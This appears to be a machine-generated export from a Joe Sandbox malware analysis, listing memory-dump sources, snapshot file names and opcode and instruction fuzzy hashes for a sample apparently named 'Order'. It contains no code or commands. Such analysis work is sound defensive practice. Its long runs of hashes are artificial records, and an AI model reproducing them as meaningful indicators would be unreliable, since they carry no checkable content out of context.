                                                                • Instruction ID: 3eef11e86355183a55c912c8dff26b35d9f5108eb572a8d10026c52a44933083
                                                                • Opcode Fuzzy Hash: a09afe71d8b413d126f6b3ee5b63bd58d611a9842a4ca083ba9808d2801dba07
                                                                • Instruction Fuzzy Hash: 2C0184B26019417BD312AB79CD84E57B7ACFBD4654B004629B50D93561DB74EC11C6A0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3caac10335c2662239687bb858deea1edfbb837bdde958cab8c84ac73767b161
                                                                • Instruction ID: 018c4c27f836232d36d251f7532616d58cc46e4aef0ecf2adf9fa44719fb8f6f
                                                                • Opcode Fuzzy Hash: 3caac10335c2662239687bb858deea1edfbb837bdde958cab8c84ac73767b161
                                                                • Instruction Fuzzy Hash: 2F01D8322186029BC364DF6A9888967BBB8FF98660F514229FE5D871C0E7309901C7D1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0731157ffb21997e8efcab4b97728bf8ad0b6e88b5c91a6c6571e0bfe4fbd4b1
                                                                • Instruction ID: 64b1e16662d1006f12c46b1ba87679275fed5b32231131000e8ed95b88d0aa78
                                                                • Opcode Fuzzy Hash: 0731157ffb21997e8efcab4b97728bf8ad0b6e88b5c91a6c6571e0bfe4fbd4b1
                                                                • Instruction Fuzzy Hash: 27116975A0220DEFDB15EFA8D944EAE7BB5FB88350F004059FD0597396DA34EA11CB90
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f6a410538839b753e1c055f322f449f494a78831a2a3772e4669c7a19c92cbe
                                                                • Instruction ID: e3d75f307426ae6f0b8b81edb9411d8bc35dd3d801c7463c81dc507e4be19aaa
                                                                • Opcode Fuzzy Hash: 5f6a410538839b753e1c055f322f449f494a78831a2a3772e4669c7a19c92cbe
                                                                • Instruction Fuzzy Hash: 931179B56093089FC710DF69D441A5BBBE4FF98310F00851EBA98D7391E630E900CBA2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                • Instruction ID: c11d4ea50143bcc3186bdc39b2a58892359a2f065cda525d8a45b45b6c509e26
                                                                • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                • Instruction Fuzzy Hash: 5301FC32200A059FDF21DB5DD944F57B7E6FFC9610F044459E6428BA50DA74F8D2C754
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 952877afcc3249a92a7b860a944fbfeda057722c19140739fbf617a4e0707dee
                                                                • Instruction ID: 72e6bea9ec0cc40e3d56ec14cdced41a1d7d0fbbdd959e1fab67bb5bd8719e67
                                                                • Opcode Fuzzy Hash: 952877afcc3249a92a7b860a944fbfeda057722c19140739fbf617a4e0707dee
                                                                • Instruction Fuzzy Hash: 611179B16093089FC700DF69D441A5BBBE4FF99350F00852AB958D73A5E630E900CBA2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                • Instruction ID: 68c66855c465207390d7510e92723560f28c043ed53de527a78a25796501f1de
                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                • Instruction Fuzzy Hash: A20178722046809FE326875DCA58F777BECEB84B54F0D84A5FA09CB6A1D668DC40C662
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81c0b7e7f251fcff9e9b9eebdc74e769e2763a063789648ab6789d08597f687b
                                                                • Instruction ID: 7b49dda6c165de3fb5e0d4e2c6f9ccb01a2fac01b815c62ba680effdced669ee
                                                                • Opcode Fuzzy Hash: 81c0b7e7f251fcff9e9b9eebdc74e769e2763a063789648ab6789d08597f687b
                                                                • Instruction Fuzzy Hash: DC01F731700609EFD714DB6ADA849EFB7FCFF88650F054029990997640EE30FC01C690
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e54eaebb0c2dfd7cbafaf906d9cd55bd9d43c10cd4bba0a1383f67067a9f46d6
                                                                • Instruction ID: 314c7037fe3cc7bdc235d0af51164c1df33b27c1bdc490a38644e9d31e263ea5
                                                                • Opcode Fuzzy Hash: e54eaebb0c2dfd7cbafaf906d9cd55bd9d43c10cd4bba0a1383f67067a9f46d6
                                                                • Instruction Fuzzy Hash: 5301A275280741AFD3319B19D980F56BABCEF55F50F11842AB60A9F3A1D6B09881CB64
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 04cc4c16dd2fbfb6b54498efd1fb671d2c42999f566bebd43c2ae12897282dc4
                                                                • Instruction ID: 902fba36787f1b0375a4580a939f714540fe2ee3e346ee3625c3f8be30524303
                                                                • Opcode Fuzzy Hash: 04cc4c16dd2fbfb6b54498efd1fb671d2c42999f566bebd43c2ae12897282dc4
                                                                • Instruction Fuzzy Hash: 1BF0F432B41B50BBD731DB5A8D40F57BAADEBD4EA0F01842DA60997600CA30ED01CBB1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                • Instruction ID: 8aac858227d98f440972a070cd0d8a194b05b66b753012edd9d6c21b6dde07ce
                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                • Instruction Fuzzy Hash: 04F0C2B2600611ABE325CF4DDC40E57FBEEDBD1B91F058128E549C7220EA31ED04CB90
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                • Instruction ID: 3fdb8fc555825e05adcf8d3ff5dbe95db0ff30a5830b501f007e9b8d56206010
                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                • Instruction Fuzzy Hash: 2FF021732066339BD732565D49C0FEBA5998FD1A65F590036F20D9B204C9649D0157D1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb2428092a43d7b58d6224d817b036605a5bfe0158f47ad936f91de98b41bbac
                                                                • Instruction ID: 5989d90076912f78420b6fa19e0e94204ca50e33209a43e9d0b24d654fb04449
                                                                • Opcode Fuzzy Hash: cb2428092a43d7b58d6224d817b036605a5bfe0158f47ad936f91de98b41bbac
                                                                • Instruction Fuzzy Hash: B1014F71E10249EFDB04DFA9E551AAEB7F8FF58304F10406AF904E7391D6749A01CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d093b1303b03b05707d5f7c1a6bd23337432a4a1183c3f8f73da449d5504564
                                                                • Instruction ID: a6d8c6929163e62bae3f4745f0e80ed700a1a8602723d902b10e5c2d826d3846
                                                                • Opcode Fuzzy Hash: 1d093b1303b03b05707d5f7c1a6bd23337432a4a1183c3f8f73da449d5504564
                                                                • Instruction Fuzzy Hash: 20014471E00209EFDB04DFA9E541AAEB7F8FF58304F50405AF914E7391D6749E018BA0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5fa9cbdf757f9a35cf0e40bc5341a5e1e3d6590f01e6fa33e9b3b915dc67b269
                                                                • Instruction ID: 6df365ba5cc86319583bf28ac7be11d2f087d880db7c5e714ff0447c7527a782
                                                                • Opcode Fuzzy Hash: 5fa9cbdf757f9a35cf0e40bc5341a5e1e3d6590f01e6fa33e9b3b915dc67b269
                                                                • Instruction Fuzzy Hash: A4014471E10249EFCB04DFA9D551AAEB7F8FF58304F10405AF904E7391D6749A01CBA0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8b0e4843d7dec55083dc7d2ae437fc5c31e8569e419927e6fbfbf4878e2c9115
                                                                • Instruction ID: e3eb632d8e2994d8c66a0ee140129b54dd1ae00146802e7d1251004d8c8e98e9
                                                                • Opcode Fuzzy Hash: 8b0e4843d7dec55083dc7d2ae437fc5c31e8569e419927e6fbfbf4878e2c9115
                                                                • Instruction Fuzzy Hash: 1B018F71E012499FCF00DFA9E541EEEBBF8BF58710F14405AE504A7280DB34EA01CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                • Instruction ID: 2586f5d6039f025516ecb64d484ef52ce34b8968960896b7870379e1ea42eea8
                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                • Instruction Fuzzy Hash: D7F0127220001DBFEF019F94DD80DEF7B7DEB952D8B104125FA1592160D631DD21A7A0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4edbae2e24d5f2a09805707489c8d2071e3bbd651c123a7f101cd5efeee3e75a
                                                                • Instruction ID: 398a11bb356a5b665b58c45d049f4022be970636585be73c3ea56134242aafce
                                                                • Opcode Fuzzy Hash: 4edbae2e24d5f2a09805707489c8d2071e3bbd651c123a7f101cd5efeee3e75a
                                                                • Instruction Fuzzy Hash: CB018536100249ABCF129F94D940EDE3F6AFB8C664F068105FE1A66220C332D971EF82
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3150e85493d67763545355d859a1bf888d93483155de0d792ee0862f29012e5d
                                                                • Instruction ID: 280e68a237539482cc1614f2d865f31da2fdb65b95f5b1b8df549589e6a0e44f
                                                                • Opcode Fuzzy Hash: 3150e85493d67763545355d859a1bf888d93483155de0d792ee0862f29012e5d
                                                                • Instruction Fuzzy Hash: 4DF024712143416BF768965D8E81FB2729AF7C0752F25802AEB0D9F2C1ED71DC0187A5
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 250b7ccc74f9e9ed6977c8d3d3ef9786aadb3d36d9afb3338d10a17eaea3985f
                                                                • Instruction ID: 60c40a40263b12e1b5498329a5f34b865611667a0a1726c95c31d0d9aa3dfa52
                                                                • Opcode Fuzzy Hash: 250b7ccc74f9e9ed6977c8d3d3ef9786aadb3d36d9afb3338d10a17eaea3985f
                                                                • Instruction Fuzzy Hash: 6901A474600BC1ABF323977CCD4CF2537A8BB84B00F484694BB059B6E6D768D401C711
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                • Instruction ID: 6d226f6fb2dc4a19558a83810d0681c9dbd847f47e2ea04cbd3cda85d185981d
                                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                • Instruction Fuzzy Hash: 6FF02E35345E1357FB36AB2D8410B2FBA9E9FD4D00B05052C9605CB640DF20DC00D7D0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ab08c0d612240035f722adbf2a5b428a27a38cd6d02854899fd8e136ff510880
                                                                • Instruction ID: 2b01bcbd0c738246e95abf8eeac2b9bec4c46c5aa0c1f6121001ac2d6d4f97f2
                                                                • Opcode Fuzzy Hash: ab08c0d612240035f722adbf2a5b428a27a38cd6d02854899fd8e136ff510880
                                                                • Instruction Fuzzy Hash: 0EF0C2706063449FD310EF29C541E2BB7E4FF98720F40465AB898DB3D5E634EA01CB96
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                • Instruction ID: 0fe664ac5e8d831850d31cab33d44ff44bc1f6384b8c634bb8ba624eedc4c20c
                                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                • Instruction Fuzzy Hash: D9F05E73B116529BFB229B5ECC80F16B7B8BFD5A60F190065AA08AB260C764EC0187D0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                • Instruction ID: 58972245c5a0259bc8c0907bb858aea46003ece7e67b7a7760069b1f8e3e06cb
                                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                • Instruction Fuzzy Hash: E4F02472610204BFE314DB21CC00F86B6EEFF98710F188078A648C7160FAB1ED00C754
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 317c9a9074bc36bb2f966dc8c0c91d11a1500407681951e0a2a49c55c184a2b7
                                                                • Instruction ID: 13bd57e81d2526eb9fd8d5f720d147e01e27c458ec456c8520ae74405718bd8a
                                                                • Opcode Fuzzy Hash: 317c9a9074bc36bb2f966dc8c0c91d11a1500407681951e0a2a49c55c184a2b7
                                                                • Instruction Fuzzy Hash: 28F06275A02249EFCB04EF69D555E6EB7B4FF58300F008065B959EB396DA34EA01CB50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d148ba3c1313bec6623cf0b1ac92db3ccade59c5aee84e51bb9e48056908d12
                                                                • Instruction ID: 2487f278a454c857f68966d68bcc2d5448bc07c9a050d407f0ee31e809fd721e
                                                                • Opcode Fuzzy Hash: 0d148ba3c1313bec6623cf0b1ac92db3ccade59c5aee84e51bb9e48056908d12
                                                                • Instruction Fuzzy Hash: 3FF09031B166D19FE7228B6CC564B63BBDC9B08E21F08896ED5CD87502C724D880CA53
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7baeb1cc1152110914b2a36c6097afbc7bd7ffa339de7ae74e245dbe573996f3
                                                                • Instruction ID: c2851a98752c696b022c8e05988e6d3a822d12e825f7c87b2c0b9e0c507cd269
                                                                • Opcode Fuzzy Hash: 7baeb1cc1152110914b2a36c6097afbc7bd7ffa339de7ae74e245dbe573996f3
                                                                • Instruction Fuzzy Hash: 51F0EC6A4167C10ADF327B3C7FE03D17F55A755130F191445E4B59721BC5748587C324
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: de59f79d4c502bc65f8e4ff75eb542f6c38b674cc3bfa5a185881e81ed24d34b
                                                                • Instruction ID: eef594605b69ad28e5cbe68e9764e23c5a437b6b7bc85678e96f173a0b664856
                                                                • Opcode Fuzzy Hash: de59f79d4c502bc65f8e4ff75eb542f6c38b674cc3bfa5a185881e81ed24d34b
                                                                • Instruction Fuzzy Hash: 7CF0E2B191965FBFE732971CC148F55BBDCAB44BA2F08D82ED64E87612C260E881CB50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                • Instruction ID: b3a65008cb825271ff3582130f38dc77d14fcc1a06d0c434ccc2dc9707b78af9
                                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                • Instruction Fuzzy Hash: 04E0D8323006012BE712AF599DC8F47776EDFD2B14F05407AB5085F292C9E2DC0982A4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                • Instruction ID: 48c704769d3f2e4209962d88cc8f9bf745694ab669a26b65ec3e8d012dce3509
                                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                • Instruction Fuzzy Hash: D5F03072108204AFE3619F09D944F92B7F8EB45375F86C025EA0D9B561D379EC40CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                • Instruction ID: e91ecbd5991fffd87086d6c0d0164c3a7df80ee2f45755e50b07ab2ac2209deb
                                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                • Instruction Fuzzy Hash: 5AF0E53D204345DBDB1ACF1AC450AE57BA4FB45750F084458FC8A8B301D731EA81CB91
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                • Instruction ID: 5a39f2a8a9f9a4fce6747b646b8843bc4df94a125a20aae0f05f9d429e735511
                                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                • Instruction Fuzzy Hash: 34E0DF32244685BBD3212A5D8800F6B7BAAEBD07A1F16482DE30C8B250DB74DC44C7E8
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 291442d27bdfe3ed1be715813f7c76b790b1441ec4611e60cf7879cb81f463e8
                                                                • Instruction ID: 67008ae1cba2c110e04fff40bc90bde0822a9dc7818165c4978d50f45d479814
                                                                • Opcode Fuzzy Hash: 291442d27bdfe3ed1be715813f7c76b790b1441ec4611e60cf7879cb81f463e8
                                                                • Instruction Fuzzy Hash: F7F02BB1A257914FEF72D72CF340F5277E0AF18670F2A0564D40487912C320DCC2C650
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                • Instruction ID: 4d4c5851b4d47958b4b8a955328c2a17dd442890a2574f1193f9bd5ab2eae37c
                                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                • Instruction Fuzzy Hash: A0E0DF32A00110BFEB21AB998D05F9BBEBCDB90EA0F054054B608E71E0E530EE00D790
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                • Instruction ID: a4670e120f2aba706b94b3fd1d60b8f10277bffd53776368e4a3d19a7987d2f1
                                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                • Instruction Fuzzy Hash: 6BE09B727403608BCF268B2DC340A53B7ECDF95AA0F15C069EA054B612C231F8C3C6D0
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: ede55cdc3eac0fe40c18396170455faa4751ccc428c0d7be45c03a4705c56f49
                                                                • Instruction ID: 4d622e5607a10a8d0b72f3618d2acc48a380f073cf9224f2af9c2099fd4b2986
                                                                • Opcode Fuzzy Hash: ede55cdc3eac0fe40c18396170455faa4751ccc428c0d7be45c03a4705c56f49
                                                                • Instruction Fuzzy Hash: A7E0D872100A949BC322FF29DD15F8B779AEFA0764F014519F159571A1CB34AD10C7D4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
